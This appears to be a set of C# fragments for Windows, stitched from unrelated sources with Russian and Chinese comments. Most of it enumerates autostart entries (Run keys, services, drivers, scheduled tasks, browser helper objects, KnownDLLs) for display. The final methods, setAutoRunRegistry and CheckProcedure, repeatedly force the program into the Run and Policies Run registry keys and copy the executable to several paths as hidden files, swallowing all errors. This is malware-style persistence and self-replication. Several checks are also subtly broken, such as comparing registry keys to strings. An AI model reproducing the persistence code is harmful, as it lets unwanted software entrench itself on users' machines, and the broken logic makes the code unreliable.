/// <param name="index">Индекс номер имени массива из конфига RegMon</param>
private void setAutoRunRegistry(RegistryKey key, byte index)
{
if (!key.Equals(Config.RegName[index]) ||
(key.Equals(Config.RegName[index]) &&
!key.GetValue(Config.RegName[index]).ToString().Contains(Config.FilePath[index]))
)
{
key.SetValue(Config.RegName[index], ('"' + Config.FilePath[index] + '"'));
}
}
//tests whether Java is installed.
private static Boolean testJavaInstalled()
{
RegistryKey rk = Registry.LocalMachine;
RegistryKey subKey = rk.OpenSubKey("SOFTWARE\\JavaSoft\\Java Runtime Environment");
string currentVerion = subKey == null ? "" : subKey.GetValue("CurrentVersion").ToString();
return(!subKey.Equals(""));
}
private string GetOracleHomePath(string OracleHomeRegistryKey)
{
RegistryKey rgkLM = Registry.LocalMachine;
RegistryKey rgkOracleHome = rgkLM.OpenSubKey(@"SOFTWARE\ORACLE\" + OracleHomeRegistryKey);
if (!rgkOracleHome.Equals(""))
{
return(rgkOracleHome.GetValue("ORACLE_HOME").ToString());
}
return("");
}
private void Form1_Load(object sender, EventArgs e)
{
ListViewItem listViewItem = new ListViewItem();
string item, name;
int start, dot;
#region Logon
LogonResult.Items.Clear();
LogonResult.Groups.Clear();
#region LocalMachine->Run
string HKLM_Logon = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";
ListViewGroup LogonGroup1 = new ListViewGroup();
LogonGroup1.Header = "HKLM\\" + HKLM_Logon;
LogonResult.Groups.Add(LogonGroup1);
RegistryKey hklm_logon = Registry.LocalMachine.OpenSubKey(HKLM_Logon);
for (int i = 0; i < hklm_logon.GetValueNames().Length; i++)
{
item = hklm_logon.GetValueNames().ElementAt(i);
name = hklm_logon.GetValue(item).ToString();
if (name == "")
{
continue;
}
start = name.IndexOf(":") - 1;
if (start == -2)
{
start = 0;
}
dot = name.IndexOf(".");
string file = name.Substring(start, dot - start + 4);
if (file.IndexOf(":") == -1)
{
file = "C:\\Windows\\system32\\" + file;
}
listViewItem = new ListViewItem(item);
try
{
FileVersionInfo fileVersion = FileVersionInfo.GetVersionInfo(name);
listViewItem.SubItems.Add(fileVersion.FileDescription);
listViewItem.SubItems.Add(fileVersion.ProductName);
}
catch
{
listViewItem.SubItems.Add("");
listViewItem.SubItems.Add("");
}
listViewItem.SubItems.Add(name);
LogonGroup1.Items.Add(listViewItem);
LogonResult.Items.Add(listViewItem);
}
#endregion LocalMachine->Run
#region CurrentUser->Run
string HKCU_Logon = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";
ListViewGroup LogonGroup2 = new ListViewGroup();
LogonGroup2.Header = "HKCU\\" + HKCU_Logon;
LogonResult.Groups.Add(LogonGroup2);
RegistryKey hkcu_logon = Registry.CurrentUser.OpenSubKey(HKCU_Logon);
for (int i = 0; i < hkcu_logon.GetValueNames().Length; i++)
{
item = hkcu_logon.GetValueNames().ElementAt(i);
name = hkcu_logon.GetValue(item).ToString();
if (name == "")
{
continue;
}
start = name.IndexOf(":") - 1;
if (start == -2)
{
start = 0;
}
dot = name.IndexOf(".");
string file = name.Substring(start, dot - start + 4);
if (file.IndexOf(":") == -1)
{
file = "C:\\Windows\\system32\\" + file;
}
listViewItem = new ListViewItem(item);
try
{
FileVersionInfo fileVersion = FileVersionInfo.GetVersionInfo(file);
listViewItem.SubItems.Add(fileVersion.FileDescription);
listViewItem.SubItems.Add(fileVersion.ProductName);
}
catch
{
listViewItem.SubItems.Add("");
listViewItem.SubItems.Add("");
}
listViewItem.SubItems.Add(file);
LogonGroup2.Items.Add(listViewItem);
LogonResult.Items.Add(listViewItem);
}
#endregion CurrentUser->Run
#region LocalMachine->AlternateShell
string HCLM_AlternateShell = "SYSTEM\\CurrentControlSet\\Control\\SafeBoot";
ListViewGroup LogonGroup3 = new ListViewGroup();
LogonGroup3.Header = "HKLM\\" + HCLM_AlternateShell;
LogonResult.Groups.Add(LogonGroup3);
RegistryKey hklm_alternateshell = Registry.LocalMachine.OpenSubKey(HCLM_AlternateShell);
for (int i = 0; i < hklm_alternateshell.GetValueNames().Length; i++)
{
item = hklm_alternateshell.GetValueNames().ElementAt(i);
name = hklm_alternateshell.GetValue(item).ToString();
if (name == "")
{
continue;
}
start = name.IndexOf(":") - 1;
if (start == -2)
{
start = 0;
}
dot = name.IndexOf(".");
string file = name.Substring(start, dot - start + 4);
if (file.IndexOf(":") == -1)
{
file = "C:\\Windows\\system32\\" + file;
}
listViewItem = new ListViewItem(name);
try
{
FileVersionInfo fileVersion = FileVersionInfo.GetVersionInfo(name);
listViewItem.SubItems.Add(fileVersion.FileDescription);
listViewItem.SubItems.Add(fileVersion.ProductName);
}
catch
{
listViewItem.SubItems.Add("");
listViewItem.SubItems.Add("");
}
listViewItem.SubItems.Add(file);
LogonGroup3.Items.Add(listViewItem);
LogonResult.Items.Add(listViewItem);
}
#endregion LocalMachine->AlternateShell
#region LocalMachine->wow64run
string HCLM_wow64run = "SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run";
ListViewGroup LogonGroup4 = new ListViewGroup();
LogonGroup4.Header = "HKLM\\" + HCLM_wow64run;
LogonResult.Groups.Add(LogonGroup4);
RegistryKey hklm_wow64run = Registry.LocalMachine.OpenSubKey(HCLM_wow64run);
for (int i = 0; i < hklm_wow64run.GetValueNames().Length; i++)
{
item = hklm_wow64run.GetValueNames().ElementAt(i);
name = hklm_wow64run.GetValue(item).ToString();
if (name == "")
{
continue;
}
start = name.IndexOf(":") - 1;
if (start == -2)
{
start = 0;
}
dot = name.IndexOf(".");
string file = name.Substring(start, dot - start + 4);
if (file.IndexOf(":") == -1)
{
file = "C:\\Windows\\system32\\" + file;
}
listViewItem = new ListViewItem(item);
try
{
FileVersionInfo fileVersion = FileVersionInfo.GetVersionInfo(name);
listViewItem.SubItems.Add(fileVersion.FileDescription);
listViewItem.SubItems.Add(fileVersion.ProductName);
}
catch
{
listViewItem.SubItems.Add("");
listViewItem.SubItems.Add("");
}
listViewItem.SubItems.Add(file);
LogonGroup4.Items.Add(listViewItem);
LogonResult.Items.Add(listViewItem);
}
#endregion LocalMachine->wow64run
#region LocalMachine->InstalledComponents
string HCLM_InstalledComponents = "SOFTWARE\\Microsoft\\Active Setup\\Installed Components";
ListViewGroup LogonGroup5 = new ListViewGroup();
LogonGroup5.Header = "HKLM\\" + HCLM_InstalledComponents;
LogonResult.Groups.Add(LogonGroup5);
RegistryKey hklm_InstalledComponents = Registry.LocalMachine.OpenSubKey(HCLM_InstalledComponents);
for (int i = 0; i < hklm_InstalledComponents.GetValueNames().Length; i++)
{
item = hklm_InstalledComponents.GetValueNames().ElementAt(i);
name = hklm_InstalledComponents.GetValue(item).ToString();
if (name == "")
{
continue;
}
start = name.IndexOf(":") - 1;
if (start == -2)
{
start = 0;
}
dot = name.IndexOf(".");
string file = name.Substring(start, dot - start + 4);
if (file.IndexOf(":") == -1)
{
file = "C:\\Windows\\system32\\" + file;
}
listViewItem = new ListViewItem(item);
try
{
FileVersionInfo fileVersion = FileVersionInfo.GetVersionInfo(name);
listViewItem.SubItems.Add(fileVersion.FileDescription);
listViewItem.SubItems.Add(fileVersion.ProductName);
}
catch
{
listViewItem.SubItems.Add("");
listViewItem.SubItems.Add("");
}
listViewItem.SubItems.Add(file);
LogonGroup5.Items.Add(listViewItem);
LogonResult.Items.Add(listViewItem);
}
#endregion LocalMachine->InstalledComponents
#endregion Logon
#region Services
ServicesResult.Items.Clear();
ServicesResult.Groups.Clear();
#region LocalMachine->Services
string HKLM_Services = "System\\CurrentControlSet\\Services";
ListViewGroup ServicesGroup1 = new ListViewGroup();
ServicesGroup1.Header = "HKLM\\" + HKLM_Services;
ServicesResult.Groups.Add(ServicesGroup1);
RegistryKey hklm_services = Registry.LocalMachine.OpenSubKey(HKLM_Services);
int type;
string path, image_path;
foreach (string ServiceName in hklm_services.GetSubKeyNames())
{
RegistryKey key = hklm_services.OpenSubKey(ServiceName);
if (key.GetValue("Type") != null)
{
type = (int)key.GetValue("Type");
}
else
{
type = 0;
}
if (key.GetValue("ImagePath") != null)
{
path = key.GetValue("ImagePath").ToString();
}
else
{
path = "";
}
/*Type:
* 1 2 4 8: drivers
* 16 win32服务,以其自身进程运行,不与其他服务共享可执行文件(即宿主进程)
* 32 win32服务,作为共享进程运行,与其他服务共享可执行文件(即宿主进程)
* 272 win32服务,以其自身进程运行,同时服务可与桌面交互,接受用户输入,交互服务必须以localsystem本地系统帐户运行
* 288 win32服务,以共享进程运行,同时服务可与桌面交互,接受用户输入,交互服务必须以localsystem本地系统帐户运行
*/
if ((type >= 16))
{
string tmp_path = path.ToLower();
// find svchost
if (path.ToLower().IndexOf("svchost") != -1)
{
RegistryKey parameter = key.OpenSubKey("Parameters");
if (parameter != null)
{
image_path = parameter.GetValue("ServiceDLL").ToString();
}
else
{
if (path.IndexOf(":") == -1)
{
image_path = "C:\\Windows\\system32\\" + path;
}
else
{
start = path.IndexOf(":") - 1;
image_path = path.Substring(start, path.IndexOf(".") - start + 4);
}
}
}
else
{
if (path.IndexOf(":") == -1)
{
image_path = "C:\\Windows\\system32\\" + path;
}
else
{
start = path.IndexOf(":") - 1;
image_path = path.Substring(start, path.IndexOf(".") - start + 4);
}
}
try
{
FileVersionInfo fileVersionInfo = FileVersionInfo.GetVersionInfo(image_path);
listViewItem = new ListViewItem(ServiceName);
listViewItem.SubItems.Add(fileVersionInfo.FileDescription);
listViewItem.SubItems.Add(fileVersionInfo.ProductName);
listViewItem.SubItems.Add(image_path);
}
catch
{
listViewItem = new ListViewItem(ServiceName);
listViewItem.SubItems.Add("");
listViewItem.SubItems.Add("");
listViewItem.SubItems.Add(image_path);
}
ServicesGroup1.Items.Add(listViewItem);
ServicesResult.Items.Add(listViewItem);
}
}
#endregion LocalMachine->Services
#endregion Services
#region Drivers
DriversResult.Items.Clear();
DriversResult.Groups.Clear();
#region LocalMachine->Drivers
ListViewGroup DriversGroup1 = new ListViewGroup();
DriversGroup1.Header = "HKLM\\" + HKLM_Services;
DriversResult.Groups.Add(DriversGroup1);
foreach (string DriversName in hklm_services.GetSubKeyNames())
{
RegistryKey key = hklm_services.OpenSubKey(DriversName);
if (key.GetValue("ImagePath") != null)
{
path = key.GetValue("ImagePath").ToString();
}
else
{
path = "";
}
if (key.GetValue("Type") != null)
{
type = (int)key.GetValue("Type");
}
else
{
type = 0;
}
/*Type:
* 1 2 4 8: drivers
* 16 win32服务,以其自身进程运行,不与其他服务共享可执行文件(即宿主进程)
* 32 win32服务,作为共享进程运行,与其他服务共享可执行文件(即宿主进程)
* 272 win32服务,以其自身进程运行,同时服务可与桌面交互,接受用户输入,交互服务必须以localsystem本地系统帐户运行
* 288 win32服务,以共享进程运行,同时服务可与桌面交互,接受用户输入,交互服务必须以localsystem本地系统帐户运行
*/
if ((type == 1) || (type == 2) || (type == 4) || (type == 8))
{
if (path.IndexOf(".sys") == -1)
{
continue;
}
if (path.IndexOf("\\SystemRoot") != -1)
{
image_path = "C:\\Windows" + path.Substring(path.IndexOf("\\SystemRoot") + 10, path.Length - 10);
}
else
{
if (path.IndexOf(":") != -1)
{
start = path.IndexOf(":") - 1;
dot = path.IndexOf(".");
image_path = path.Substring(start, dot - start + 4);
}
else
{
image_path = "C:\\Windows\\" + path;
}
}
listViewItem = new ListViewItem(DriversName);
try
{
FileVersionInfo fileVersion = FileVersionInfo.GetVersionInfo(image_path);
listViewItem.SubItems.Add(fileVersion.FileDescription);
listViewItem.SubItems.Add(fileVersion.ProductName);
}
catch
{
listViewItem.SubItems.Add("");
listViewItem.SubItems.Add("");
}
listViewItem.SubItems.Add(image_path);
DriversGroup1.Items.Add(listViewItem);
DriversResult.Items.Add(listViewItem);
}
}
#endregion LocalMachine->Drivers
#endregion Drivers
#region ScheduledTasks
ScheduledTasksResult.Items.Clear();
ScheduledTasksResult.Groups.Clear();
#region C:\Windows\System32\Tasks
string ScheduledTask_Path = "C:\\Windows\\System32\\Tasks";
ListViewGroup ScheduledTasksGroup1 = new ListViewGroup();
ScheduledTasksGroup1.Header = ScheduledTask_Path;
ScheduledTasksResult.Groups.Add(ScheduledTasksGroup1);
TaskSchedulerClass ts = new TaskSchedulerClass();
ts.Connect(null, null, null, null);
ITaskFolder folder = ts.GetFolder("\\");
IRegisteredTaskCollection tasks_exists = folder.GetTasks(1);
for (int i = 1; i <= tasks_exists.Count; i++)
{
IRegisteredTask t = tasks_exists[i];
try
{
listViewItem = new ListViewItem(t.Name);
string xml = t.Xml;
string description = xml.Substring(xml.IndexOf("<Description>") + 13, xml.IndexOf("</Description>") - xml.IndexOf("<Description>") - 13);
string imagePath = xml.Substring(xml.IndexOf("<Command>") + 9, xml.IndexOf("</Command>") - xml.IndexOf("<Command>") - 9);
if (imagePath.IndexOf("{") > 0)
{
imagePath = imagePath.Substring(0, imagePath.IndexOf("{"));
}
string publisher = xml.Substring(xml.IndexOf("<Author>") + 8, xml.IndexOf("</Author>") - xml.IndexOf("<Author>") - 8);
listViewItem.SubItems.Add(description);
listViewItem.SubItems.Add(publisher);
listViewItem.SubItems.Add(imagePath);
}
catch
{
listViewItem = new ListViewItem(t.Name);
string xml = t.Xml;
listViewItem.SubItems.Add("");
listViewItem.SubItems.Add("");
string imagePath = xml.Substring(xml.IndexOf("<Command>") + 9, xml.IndexOf("</Command>") - xml.IndexOf("<Command>") - 9);
if (imagePath.IndexOf("{") > 0)
{
imagePath = imagePath.Substring(0, imagePath.IndexOf("{"));
}
listViewItem.SubItems.Add(imagePath);
}
ScheduledTasksGroup1.Items.Add(listViewItem);
ScheduledTasksResult.Items.Add(listViewItem);
}
#endregion C:\Windows\System32\Tasks
#endregion ScheduledTasks
#region InternetExplorer
InternetExplorerResult.Items.Clear();
InternetExplorerResult.Groups.Clear();
#region LocalMachine->IE BHO
string HKLM_CLSID = "Software\\Classes\\CLSID";
string HKLM_IE_BHO = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects";
ListViewGroup IEGroup1 = new ListViewGroup();
IEGroup1.Header = "HKLM\\" + HKLM_IE_BHO;
InternetExplorerResult.Groups.Add(IEGroup1);
RegistryKey hklm_ie_bho = Registry.LocalMachine.OpenSubKey(HKLM_IE_BHO);
RegistryKey hklm_clsid = Registry.LocalMachine.OpenSubKey(HKLM_CLSID);
foreach (string InternetName in hklm_ie_bho.GetSubKeyNames())
{
if (InternetName == null)
{
continue;
}
foreach (string key in hklm_clsid.GetSubKeyNames())
{
if (key == null)
{
continue;
}
if (key.Equals(InternetName))
{
RegistryKey subkey = hklm_clsid.OpenSubKey(key).OpenSubKey("InprocServer32");
FileVersionInfo fileVersionInfo = FileVersionInfo.GetVersionInfo(subkey.GetValue("").ToString());
ListViewItem ie = new ListViewItem();
ie.SubItems[0].Text = fileVersionInfo.InternalName;
ie.SubItems.Add(fileVersionInfo.FileDescription);
ie.SubItems.Add(fileVersionInfo.ProductName);
ie.SubItems.Add(fileVersionInfo.FileName);
if (!fileVersionInfo.InternalName.Equals(""))
{
IEGroup1.Items.Add(ie);
InternetExplorerResult.Items.Add(ie);
}
}
}
}
#endregion LocalMachine->IE BHO
#endregion InternetExplorer
#region KnownDLLs
KnownDLLResult.Items.Clear();
KnownDLLResult.Groups.Clear();
#region LocalMachine->Known DLLs
string HKLM_KnownDLLs = "System\\CurrentControlSet\\Control\\Session Manager\\KnownDlls";
ListViewGroup KnownDLLsGroup = new ListViewGroup();
KnownDLLsGroup.Header = "HKLM\\" + HKLM_KnownDLLs;
KnownDLLResult.Groups.Add(KnownDLLsGroup);
string dlldir = "";
RegistryKey hklm_dll = Registry.LocalMachine.OpenSubKey(HKLM_KnownDLLs);
foreach (string dll in hklm_dll.GetValueNames())
{
if (hklm_dll.Equals("DllDirectory"))
{
dlldir = hklm_dll.GetValue(dll).ToString();
break;
}
}
foreach (string valuename in hklm_dll.GetValueNames())
{
string dllname = hklm_dll.GetValue(valuename).ToString();
if (dllname.IndexOf(".dll") == -1)
{
continue;
}
listViewItem = new ListViewItem(valuename);
path = dlldir + "\\" + dllname;
try
{
FileVersionInfo fileVersion = FileVersionInfo.GetVersionInfo(path);
listViewItem.SubItems.Add(fileVersion.FileDescription);
listViewItem.SubItems.Add(fileVersion.ProductName);
listViewItem.SubItems.Add(path);
}
catch
{
listViewItem.SubItems.Add("");
listViewItem.SubItems.Add("");
listViewItem.SubItems.Add(path);
}
KnownDLLsGroup.Items.Add(listViewItem);
KnownDLLResult.Items.Add(listViewItem);
}
#endregion LocalMachine->Known DLLs
#endregion KnownDLLs
}
private void CheckProcedure(object source, ElapsedEventArgs eArgs)
{
if (cMain.ConfigClass.bAdminStatus == true)
{
try
{
rKey = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", true);
if (rKey.Equals(cMain.ConfigClass.sRegName[0]))
{
if (rKey.GetValue(cMain.ConfigClass.sRegName[0]).ToString() != ('"' + cMain.ConfigClass.sFilePath[0] + '"'))
{
rKey.SetValue(cMain.ConfigClass.sRegName[0], ('"' + cMain.ConfigClass.sFilePath[0] + '"'));
}
}
else
{
rKey.SetValue(cMain.ConfigClass.sRegName[0], ('"' + cMain.ConfigClass.sFilePath[0] + '"'));
}
}
catch { }
try
{
rKey = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run", true);
if (rKey.Equals(cMain.ConfigClass.sRegName[1]))
{
if (rKey.GetValue(cMain.ConfigClass.sRegName[1]).ToString() != ('"' + cMain.ConfigClass.sFilePath[1] + '"'))
{
rKey.SetValue(cMain.ConfigClass.sRegName[1], ('"' + cMain.ConfigClass.sFilePath[1] + '"'));
}
}
else
{
rKey.SetValue(cMain.ConfigClass.sRegName[1], ('"' + cMain.ConfigClass.sFilePath[1] + '"'));
}
}
catch { }
}
else
{
try
{
rKey = Registry.CurrentUser.OpenSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", true);
if (rKey.Equals(cMain.ConfigClass.sRegName[0]))
{
if (rKey.GetValue(cMain.ConfigClass.sRegName[0]).ToString() != ('"' + cMain.ConfigClass.sFilePath[0] + '"'))
{
rKey.SetValue(cMain.ConfigClass.sRegName[0], ('"' + cMain.ConfigClass.sFilePath[0] + '"'));
}
}
else
{
rKey.SetValue(cMain.ConfigClass.sRegName[0], ('"' + cMain.ConfigClass.sFilePath[0] + '"'));
}
}
catch { }
try
{
rKey = Registry.CurrentUser.OpenSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run", true);
if (rKey.Equals(cMain.ConfigClass.sRegName[1]))
{
if (rKey.GetValue(cMain.ConfigClass.sRegName[1]).ToString() != ('"' + cMain.ConfigClass.sFilePath[1] + '"'))
{
rKey.SetValue(cMain.ConfigClass.sRegName[1], ('"' + cMain.ConfigClass.sFilePath[1] + '"'));
}
}
else
{
rKey.SetValue(cMain.ConfigClass.sRegName[1], ('"' + cMain.ConfigClass.sFilePath[1] + '"'));
}
}
catch { }
}
try
{
foreach (string sPath in cMain.ConfigClass.sFilePath)
{
if (cMain.FunctionClass.checkFile(sPath) == false)
{
File.Copy(sSelfPath, sPath);
File.SetAttributes(sPath, FileAttributes.Hidden);
}
}
}
catch { }
}